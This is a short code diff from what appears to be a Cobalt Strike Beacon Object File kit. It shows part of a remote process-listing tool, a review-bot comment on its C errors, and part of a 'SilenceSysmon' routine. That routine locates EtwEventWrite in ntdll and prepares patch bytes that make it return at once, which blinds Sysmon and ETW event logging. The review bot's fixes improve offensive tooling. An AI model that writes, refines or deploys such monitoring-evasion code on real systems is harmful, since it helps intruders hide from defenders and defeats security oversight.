 
@@ -119,9 +117,7 @@ int ListProcesses(HANDLE handleTargetHost) {
 		KERNEL32$MultiByteToWideChar(CP_ACP, 0, procName, -1, WCprocName, 256);
 		BeaconPrintToStreamW(L"%-40s\t%d\t%23d\n",WCprocName ,proc_info[i].ProcessId ,proc_info[i].SessionId);
 	}
-	
 	WTSAPI32$WTSCloseServer(handleTargetHost);
-	
 	return 0;
 }
 
@@ -137,10 +133,8 @@ void go(char *args, int len) {
     hostName = BeaconDataExtract(&parser, &argSize);
 
 	handleTargetHost = WTSAPI32$WTSOpenServerA(hostName);
-	
 	res = ListProcesses(handleTargetHost);
 	
-	//print data to CS console
 	BeaconOutputStreamW();
 
 	return 0;
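Review bot: `go` is declared `void go(char *args, int len)` yet ends with `return 0;`, which C compilers reject or warn on (`return with a value, in function returning void`); declare it `int go(char *args, int len)` as the other BOFs in this kit do, or drop the value. `res` from `ListProcesses` is assigned and never read, and `BeaconOutputStreamW()` runs regardless, so either check it or remove it; note that `WTSOpenServerA` is documented to return an unusable handle rather than NULL on failure, so the meaningful failure check belongs on the first WTS call that uses the handle inside `ListProcesses`, which should then return non-zero. `go` begins before this hunk and its closing brace is outside it.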

+ 0 - 3
KIT/SilenceSysmon/silencesysmon.c

@@ -29,16 +29,13 @@ BOOL SetPrivilege(LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) {
 
 
 int SilentSysmon(HANDLE hProc) {
-
 	HANDLE hThread = NULL;
 	unsigned char sEtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0x0 };
 	
 	void * pEventWrite = GetProcAddress(GetModuleHandle("ntdll.dll"), (LPCSTR) sEtwEventWrite);
 #ifdef _WIN64
-	// xor rax, rax; ret
 	char patch[] = "\x48\x33\xc0\xc3";
 #else
-	// xor eax, eax; ret 14
 	char patch[] = "\x33\xc0\xc2\x14\x00";
 #endif